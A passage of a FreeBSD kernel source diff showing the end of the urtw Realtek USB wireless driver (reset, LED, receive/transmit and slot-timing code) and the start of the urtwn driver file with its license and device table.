sizeof(uint8_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_8180_set_anaparam(struct urtw_softc *sc, uint32_t val) { uint8_t data; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); urtw_write32_m(sc, URTW_ANAPARAM, val); urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_8185_set_anaparam2(struct urtw_softc *sc, uint32_t val) { uint8_t data; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); urtw_write32_m(sc, URTW_ANAPARAM2, val); urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_intr_enable(struct urtw_softc *sc) { usb_error_t error; urtw_write16_m(sc, URTW_INTR_MASK, 0xffff); fail: return (error); } static usb_error_t urtw_intr_disable(struct urtw_softc *sc) { usb_error_t error; urtw_write16_m(sc, URTW_INTR_MASK, 0); fail: return (error); } static usb_error_t urtw_reset(struct urtw_softc *sc) { uint8_t data; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; error = urtw_intr_disable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_write8e(sc, 0x18, 0x10); if (error != 0) goto fail; error = urtw_write8e(sc, 0x18, 0x11); if (error != 0) goto fail; error = urtw_write8e(sc, 0x18, 0x00); if (error != 0) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); urtw_read8_m(sc, URTW_CMD, &data); data = (data & 0x2) | URTW_CMD_RST; urtw_write8_m(sc, URTW_CMD, data); usb_pause_mtx(&sc->sc_mtx, 100); urtw_read8_m(sc, URTW_CMD, &data); if (data & URTW_CMD_RST) { device_printf(sc->sc_dev, "reset timeout\n"); goto fail; } error = urtw_set_mode(sc, URTW_EPROM_CMD_LOAD); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; fail: return (error); } static usb_error_t urtw_led_ctl(struct urtw_softc *sc, int mode) { usb_error_t error = 0; switch (sc->sc_strategy) { case URTW_SW_LED_MODE0: error = urtw_led_mode0(sc, mode); break; case URTW_SW_LED_MODE1: error = urtw_led_mode1(sc, mode); break; case URTW_SW_LED_MODE2: error = urtw_led_mode2(sc, mode); break; case URTW_SW_LED_MODE3: error = urtw_led_mode3(sc, mode); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED mode %d\n", sc->sc_strategy); error = USB_ERR_INVAL; break; } return (error); } static usb_error_t urtw_led_mode0(struct urtw_softc *sc, int mode) { switch (mode) { case URTW_LED_CTL_POWER_ON: sc->sc_gpio_ledstate = URTW_LED_POWER_ON_BLINK; break; case URTW_LED_CTL_TX: if (sc->sc_gpio_ledinprogress == 1) return (0); sc->sc_gpio_ledstate = URTW_LED_BLINK_NORMAL; sc->sc_gpio_blinktime = 2; break; case URTW_LED_CTL_LINK: sc->sc_gpio_ledstate = URTW_LED_ON; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED mode 0x%x", mode); return (USB_ERR_INVAL); } switch (sc->sc_gpio_ledstate) { case URTW_LED_ON: if (sc->sc_gpio_ledinprogress != 0) break; urtw_led_on(sc, URTW_LED_GPIO); break; case URTW_LED_BLINK_NORMAL: if (sc->sc_gpio_ledinprogress != 0) break; sc->sc_gpio_ledinprogress = 1; sc->sc_gpio_blinkstate = (sc->sc_gpio_ledon != 0) ? URTW_LED_OFF : URTW_LED_ON; usb_callout_reset(&sc->sc_led_ch, hz, urtw_led_ch, sc); break; case URTW_LED_POWER_ON_BLINK: urtw_led_on(sc, URTW_LED_GPIO); usb_pause_mtx(&sc->sc_mtx, 100); urtw_led_off(sc, URTW_LED_GPIO); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unknown LED status 0x%x", sc->sc_gpio_ledstate); return (USB_ERR_INVAL); } return (0); } static usb_error_t urtw_led_mode1(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_mode2(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_mode3(struct urtw_softc *sc, int mode) { return (USB_ERR_INVAL); } static usb_error_t urtw_led_on(struct urtw_softc *sc, int type) { usb_error_t error; if (type == URTW_LED_GPIO) { switch (sc->sc_gpio_ledpin) { case URTW_LED_PIN_GPIO0: urtw_write8_m(sc, URTW_GPIO, 0x01); urtw_write8_m(sc, URTW_GP_ENABLE, 0x00); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED PIN type 0x%x", sc->sc_gpio_ledpin); error = USB_ERR_INVAL; goto fail; } } else { DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED type 0x%x", type); error = USB_ERR_INVAL; goto fail; } sc->sc_gpio_ledon = 1; fail: return (error); } static usb_error_t urtw_led_off(struct urtw_softc *sc, int type) { usb_error_t error; if (type == URTW_LED_GPIO) { switch (sc->sc_gpio_ledpin) { case URTW_LED_PIN_GPIO0: urtw_write8_m(sc, URTW_GPIO, URTW_GPIO_DATA_MAGIC1); urtw_write8_m(sc, URTW_GP_ENABLE, URTW_GP_ENABLE_DATA_MAGIC1); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED PIN type 0x%x", sc->sc_gpio_ledpin); error = USB_ERR_INVAL; goto fail; } } else { DPRINTF(sc, URTW_DEBUG_STATE, "unsupported LED type 0x%x", type); error = USB_ERR_INVAL; goto fail; } sc->sc_gpio_ledon = 0; fail: return (error); } static void urtw_led_ch(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_led_task); } static void urtw_ledtask(void *arg, int pending) { struct urtw_softc *sc = arg; if (sc->sc_strategy != URTW_SW_LED_MODE0) { DPRINTF(sc, URTW_DEBUG_STATE, "could not process a LED strategy 0x%x", sc->sc_strategy); return; } URTW_LOCK(sc); urtw_led_blink(sc); URTW_UNLOCK(sc); } static usb_error_t urtw_led_blink(struct urtw_softc *sc) { uint8_t ing = 0; usb_error_t error; if (sc->sc_gpio_blinkstate == URTW_LED_ON) error = urtw_led_on(sc, URTW_LED_GPIO); else error = urtw_led_off(sc, URTW_LED_GPIO); sc->sc_gpio_blinktime--; if (sc->sc_gpio_blinktime == 0) ing = 1; else { if (sc->sc_gpio_ledstate != URTW_LED_BLINK_NORMAL && sc->sc_gpio_ledstate != URTW_LED_BLINK_SLOWLY && sc->sc_gpio_ledstate != URTW_LED_BLINK_CM3) ing = 1; } if (ing == 1) { if (sc->sc_gpio_ledstate == URTW_LED_ON && sc->sc_gpio_ledon == 0) error = urtw_led_on(sc, URTW_LED_GPIO); else if (sc->sc_gpio_ledstate == URTW_LED_OFF && sc->sc_gpio_ledon == 1) error = urtw_led_off(sc, URTW_LED_GPIO); sc->sc_gpio_blinktime = 0; sc->sc_gpio_ledinprogress = 0; return (0); } sc->sc_gpio_blinkstate = (sc->sc_gpio_blinkstate != URTW_LED_ON) ? URTW_LED_ON : URTW_LED_OFF; switch (sc->sc_gpio_ledstate) { case URTW_LED_BLINK_NORMAL: usb_callout_reset(&sc->sc_led_ch, hz, urtw_led_ch, sc); break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unknown LED status 0x%x", sc->sc_gpio_ledstate); return (USB_ERR_INVAL); } return (0); } static usb_error_t urtw_rx_enable(struct urtw_softc *sc) { uint8_t data; usb_error_t error; usbd_transfer_start((sc->sc_flags & URTW_RTL8187B) ? sc->sc_xfer[URTW_8187B_BULK_RX] : sc->sc_xfer[URTW_8187L_BULK_RX]); error = urtw_rx_setconf(sc); if (error != 0) goto fail; if ((sc->sc_flags & URTW_RTL8187B) == 0) { urtw_read8_m(sc, URTW_CMD, &data); urtw_write8_m(sc, URTW_CMD, data | URTW_CMD_RX_ENABLE); } fail: return (error); } static usb_error_t urtw_tx_enable(struct urtw_softc *sc) { uint8_t data8; uint32_t data; usb_error_t error; if (sc->sc_flags & URTW_RTL8187B) { urtw_read32_m(sc, URTW_TX_CONF, &data); data &= ~URTW_TX_LOOPBACK_MASK; data &= ~(URTW_TX_DPRETRY_MASK | URTW_TX_RTSRETRY_MASK); data &= ~(URTW_TX_NOCRC | URTW_TX_MXDMA_MASK); data &= ~URTW_TX_SWPLCPLEN; data |= URTW_TX_HW_SEQNUM | URTW_TX_DISREQQSIZE | (7 << 8) | /* short retry limit */ (7 << 0) | /* long retry limit */ (7 << 21); /* MAX TX DMA */ urtw_write32_m(sc, URTW_TX_CONF, data); urtw_read8_m(sc, URTW_MSR, &data8); data8 |= URTW_MSR_LINK_ENEDCA; urtw_write8_m(sc, URTW_MSR, data8); return (error); } urtw_read8_m(sc, URTW_CW_CONF, &data8); data8 &= ~(URTW_CW_CONF_PERPACKET_CW | URTW_CW_CONF_PERPACKET_RETRY); urtw_write8_m(sc, URTW_CW_CONF, data8); urtw_read8_m(sc, URTW_TX_AGC_CTL, &data8); data8 &= ~URTW_TX_AGC_CTL_PERPACKET_GAIN; data8 &= ~URTW_TX_AGC_CTL_PERPACKET_ANTSEL; data8 &= ~URTW_TX_AGC_CTL_FEEDBACK_ANT; urtw_write8_m(sc, URTW_TX_AGC_CTL, data8); urtw_read32_m(sc, URTW_TX_CONF, &data); data &= ~URTW_TX_LOOPBACK_MASK; data |= URTW_TX_LOOPBACK_NONE; data &= ~(URTW_TX_DPRETRY_MASK | URTW_TX_RTSRETRY_MASK); data |= sc->sc_tx_retry << URTW_TX_DPRETRY_SHIFT; data |= sc->sc_rts_retry << URTW_TX_RTSRETRY_SHIFT; data &= ~(URTW_TX_NOCRC | URTW_TX_MXDMA_MASK); data |= URTW_TX_MXDMA_2048 | URTW_TX_CWMIN | URTW_TX_DISCW; data &= ~URTW_TX_SWPLCPLEN; data |= URTW_TX_NOICV; urtw_write32_m(sc, URTW_TX_CONF, data); urtw_read8_m(sc, URTW_CMD, &data8); urtw_write8_m(sc, URTW_CMD, data8 | URTW_CMD_TX_ENABLE); fail: return (error); } static usb_error_t urtw_rx_setconf(struct urtw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t data; usb_error_t error; urtw_read32_m(sc, URTW_RX, &data); data = data &~ URTW_RX_FILTER_MASK; if (sc->sc_flags & URTW_RTL8187B) { data = data | URTW_RX_FILTER_MNG | URTW_RX_FILTER_DATA | URTW_RX_FILTER_MCAST | URTW_RX_FILTER_BCAST | URTW_RX_FILTER_NICMAC | URTW_RX_CHECK_BSSID | URTW_RX_FIFO_THRESHOLD_NONE | URTW_MAX_RX_DMA_2048 | URTW_RX_AUTORESETPHY | URTW_RCR_ONLYERLPKT; } else { data = data | URTW_RX_FILTER_MNG | URTW_RX_FILTER_DATA; data = data | URTW_RX_FILTER_BCAST | URTW_RX_FILTER_MCAST; if (ic->ic_opmode == IEEE80211_M_MONITOR) { data = data | URTW_RX_FILTER_ICVERR; data = data | URTW_RX_FILTER_PWR; } if (sc->sc_crcmon == 1 && ic->ic_opmode == IEEE80211_M_MONITOR) data = data | URTW_RX_FILTER_CRCERR; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) { data = data | URTW_RX_FILTER_ALLMAC; } else { data = data | URTW_RX_FILTER_NICMAC; data = data | URTW_RX_CHECK_BSSID; } data = data &~ URTW_RX_FIFO_THRESHOLD_MASK; data = data | URTW_RX_FIFO_THRESHOLD_NONE | URTW_RX_AUTORESETPHY; data = data &~ URTW_MAX_RX_DMA_MASK; data = data | URTW_MAX_RX_DMA_2048 | URTW_RCR_ONLYERLPKT; } urtw_write32_m(sc, URTW_RX, data); fail: return (error); } static struct mbuf * urtw_rxeof(struct usb_xfer *xfer, struct urtw_data *data, int *rssi_p, int8_t *nf_p) { int actlen, flen, rssi; struct ieee80211_frame *wh; struct mbuf *m, *mnew; struct urtw_softc *sc = data->sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t noise = 0, rate; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen < (int)URTW_MIN_RXBUFSZ) { ifp->if_ierrors++; return (NULL); } if (sc->sc_flags & URTW_RTL8187B) { struct urtw_8187b_rxhdr *rx; rx = (struct urtw_8187b_rxhdr *)(data->buf + (actlen - (sizeof(struct urtw_8187b_rxhdr)))); flen = le32toh(rx->flag) & 0xfff; if (flen > actlen) { ifp->if_ierrors++; return (NULL); } rate = (le32toh(rx->flag) >> URTW_RX_FLAG_RXRATE_SHIFT) & 0xf; /* XXX correct? */ rssi = rx->rssi & URTW_RX_RSSI_MASK; noise = rx->noise; } else { struct urtw_8187l_rxhdr *rx; rx = (struct urtw_8187l_rxhdr *)(data->buf + (actlen - (sizeof(struct urtw_8187l_rxhdr)))); flen = le32toh(rx->flag) & 0xfff; if (flen > actlen) { ifp->if_ierrors++; return (NULL); } rate = (le32toh(rx->flag) >> URTW_RX_FLAG_RXRATE_SHIFT) & 0xf; /* XXX correct? */ rssi = rx->rssi & URTW_RX_8187L_RSSI_MASK; noise = rx->noise; } mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return (NULL); } m = data->m; data->m = mnew; data->buf = mtod(mnew, uint8_t *); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = flen - IEEE80211_CRC_LEN; if (ieee80211_radiotap_active(ic)) { struct urtw_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX Are variables correct? */ tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wr_dbm_antsignal = (int8_t)rssi; } wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_DATA) sc->sc_currate = (rate > 0) ? rate : sc->sc_currate; *rssi_p = rssi; *nf_p = noise; /* XXX correct? */ return (m); } static void urtw_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct urtw_data *data; int8_t nf = -95; int rssi = 1; URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = urtw_rxeof(xfer, data, &rssi, &nf); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ URTW_UNLOCK(sc); if (m != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); m = NULL; } URTW_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } #define URTW_STATUS_TYPE_TXCLOSE 1 #define URTW_STATUS_TYPE_BEACON_INTR 0 static void urtw_txstatus_eof(struct usb_xfer *xfer) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; int actlen, type, pktretry, seq; uint64_t val; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen != sizeof(uint64_t)) return; val = le64toh(sc->sc_txstatus); type = (val >> 30) & 0x3; if (type == URTW_STATUS_TYPE_TXCLOSE) { pktretry = val & 0xff; seq = (val >> 16) & 0xff; if (pktretry == URTW_TX_MAXRETRY) ifp->if_oerrors++; DPRINTF(sc, URTW_DEBUG_TXSTATUS, "pktretry %d seq %#x\n", pktretry, seq); } } static void urtw_bulk_tx_status_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; void *dma_buf = usbd_xfer_get_frame_buffer(xfer, 0); URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: urtw_txstatus_eof(xfer); /* FALLTHROUGH */ case USB_ST_SETUP: setup: memcpy(dma_buf, &sc->sc_txstatus, sizeof(uint64_t)); usbd_xfer_set_frame_len(xfer, 0, sizeof(uint64_t)); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void urtw_txeof(struct usb_xfer *xfer, struct urtw_data *data) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; URTW_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_txtimer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void urtw_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct urtw_data *data; URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); urtw_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, URTW_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); URTW_UNLOCK(sc); urtw_start(ifp); URTW_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static struct urtw_data * _urtw_getbuf(struct urtw_softc *sc) { struct urtw_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF(sc, URTW_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct urtw_data * urtw_getbuf(struct urtw_softc *sc) { struct urtw_data *bf; URTW_ASSERT_LOCKED(sc); bf = _urtw_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, URTW_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int urtw_isbmode(uint16_t rate) { return ((rate <= 22 && rate != 12 && rate != 18) || rate == 44) ? (1) : (0); } static uint16_t urtw_rate2dbps(uint16_t rate) { switch(rate) { case 12: case 18: case 24: case 36: case 48: case 72: case 96: case 108: return (rate * 2); default: break; } return (24); } static int urtw_compute_txtime(uint16_t framelen, uint16_t rate, uint8_t ismgt, uint8_t isshort) { uint16_t ceiling, frametime, n_dbps; if (urtw_isbmode(rate)) { if (ismgt || !isshort || rate == 2) frametime = (uint16_t)(144 + 48 + (framelen * 8 / (rate / 2))); else frametime = (uint16_t)(72 + 24 + (framelen * 8 / (rate / 2))); if ((framelen * 8 % (rate / 2)) != 0) frametime++; } else { n_dbps = urtw_rate2dbps(rate); ceiling = (16 + 8 * framelen + 6) / n_dbps + (((16 + 8 * framelen + 6) % n_dbps) ? 1 : 0); frametime = (uint16_t)(16 + 4 + 4 * ceiling + 6); } return (frametime); } /* * Callback from the 802.11 layer to update the * slot time based on the current setting. */ static void urtw_updateslot(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_updateslot_task); } static void urtw_updateslottask(void *arg, int pending) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTW_LOCK(sc); if (sc->sc_flags & URTW_RTL8187B) { urtw_write8_m(sc, URTW_SIFS, 0x22); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) urtw_write8_m(sc, URTW_SLOT, 0x9); else urtw_write8_m(sc, URTW_SLOT, 0x14); urtw_write8_m(sc, URTW_8187B_EIFS, 0x5b); urtw_write8_m(sc, URTW_CARRIER_SCOUNT, 0x5b); } else { urtw_write8_m(sc, URTW_SIFS, 0x22); if (sc->sc_state == IEEE80211_S_ASSOC && ic->ic_flags & IEEE80211_F_SHSLOT) urtw_write8_m(sc, URTW_SLOT, 0x9); else urtw_write8_m(sc, URTW_SLOT, 0x14); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) { urtw_write8_m(sc, URTW_DIFS, 0x14); urtw_write8_m(sc, URTW_EIFS, 0x5b - 0x14); urtw_write8_m(sc, URTW_CW_VAL, 0x73); } else { urtw_write8_m(sc, URTW_DIFS, 0x24); urtw_write8_m(sc, URTW_EIFS, 0x5b - 0x24); urtw_write8_m(sc, URTW_CW_VAL, 0xa5); } } fail: URTW_UNLOCK(sc); } static void urtw_sysctl_node(struct urtw_softc *sc) { #define URTW_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child, *parent; struct sysctl_oid *tree; struct urtw_stats *stats = &sc->sc_stats; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, "URTW statistics"); parent = SYSCTL_CHILDREN(tree); /* Tx statistics. */ tree = SYSCTL_ADD_NODE(ctx, parent, OID_AUTO, "tx", CTLFLAG_RD, NULL, "Tx MAC statistics"); child = SYSCTL_CHILDREN(tree); URTW_SYSCTL_STAT_ADD32(ctx, child, "1m", &stats->txrates[0], "1 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "2m", &stats->txrates[1], "2 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "5.5m", &stats->txrates[2], "5.5 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "6m", &stats->txrates[4], "6 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "9m", &stats->txrates[5], "9 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "11m", &stats->txrates[3], "11 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "12m", &stats->txrates[6], "12 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "18m", &stats->txrates[7], "18 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "24m", &stats->txrates[8], "24 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "36m", &stats->txrates[9], "36 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "48m", &stats->txrates[10], "48 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "54m", &stats->txrates[11], "54 Mbit/s"); #undef URTW_SYSCTL_STAT_ADD32 } static device_method_t urtw_methods[] = { DEVMETHOD(device_probe, urtw_match), DEVMETHOD(device_attach, urtw_attach), DEVMETHOD(device_detach, urtw_detach), DEVMETHOD_END }; static driver_t urtw_driver = { .name = "urtw", .methods = urtw_methods, .size = sizeof(struct urtw_softc) }; static devclass_t urtw_devclass; DRIVER_MODULE(urtw, uhub, urtw_driver, urtw_devclass, NULL, 0); MODULE_DEPEND(urtw, wlan, 1, 1, 1); MODULE_DEPEND(urtw, usb, 1, 1, 1); MODULE_VERSION(urtw, 1); diff --git a/sys/dev/usb/wlan/if_urtwn.c b/sys/dev/usb/wlan/if_urtwn.c index de4184c24b9b..10266b827e3d 100644 --- a/sys/dev/usb/wlan/if_urtwn.c +++ b/sys/dev/usb/wlan/if_urtwn.c @@ -1,3033 +1,3033 @@ /* $OpenBSD: if_urtwn.c,v 1.16 2011/02/10 17:26:40 jakemsr Exp $ */ /*- * Copyright (c) 2010 Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * Driver for Realtek RTL8188CE-VAU/RTL8188CUS/RTL8188RU/RTL8192CU. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR urtwn_debug #include #include #ifdef USB_DEBUG static int urtwn_debug = 0; SYSCTL_NODE(_hw_usb, OID_AUTO, urtwn, CTLFLAG_RW, 0, "USB urtwn"); SYSCTL_INT(_hw_usb_urtwn, OID_AUTO, debug, CTLFLAG_RW, &urtwn_debug, 0, "Debug level"); #endif #define URTWN_RSSI(r) (r) - 110 #define IEEE80211_HAS_ADDR4(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) /* various supported device vendors/products */ static const STRUCT_USB_HOST_ID urtwn_devs[] = { #define URTWN_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } URTWN_DEV(ABOCOM, RTL8188CU_1), URTWN_DEV(ABOCOM, RTL8188CU_2), URTWN_DEV(ABOCOM, RTL8192CU), URTWN_DEV(ASUS, RTL8192CU), URTWN_DEV(AZUREWAVE, RTL8188CE_1), URTWN_DEV(AZUREWAVE, RTL8188CE_2), URTWN_DEV(AZUREWAVE, RTL8188CU), URTWN_DEV(BELKIN, F7D2102), URTWN_DEV(BELKIN, RTL8188CU), URTWN_DEV(BELKIN, RTL8192CU), URTWN_DEV(CHICONY, RTL8188CUS_1), URTWN_DEV(CHICONY, RTL8188CUS_2), URTWN_DEV(CHICONY, RTL8188CUS_3), URTWN_DEV(CHICONY, RTL8188CUS_4), URTWN_DEV(CHICONY, RTL8188CUS_5), URTWN_DEV(COREGA, RTL8192CU), URTWN_DEV(DLINK, RTL8188CU), URTWN_DEV(DLINK, RTL8192CU_1), URTWN_DEV(DLINK, RTL8192CU_2), URTWN_DEV(DLINK, RTL8192CU_3), URTWN_DEV(DLINK, DWA131B), URTWN_DEV(EDIMAX, EW7811UN), URTWN_DEV(EDIMAX, RTL8192CU), URTWN_DEV(FEIXUN, RTL8188CU), URTWN_DEV(FEIXUN, 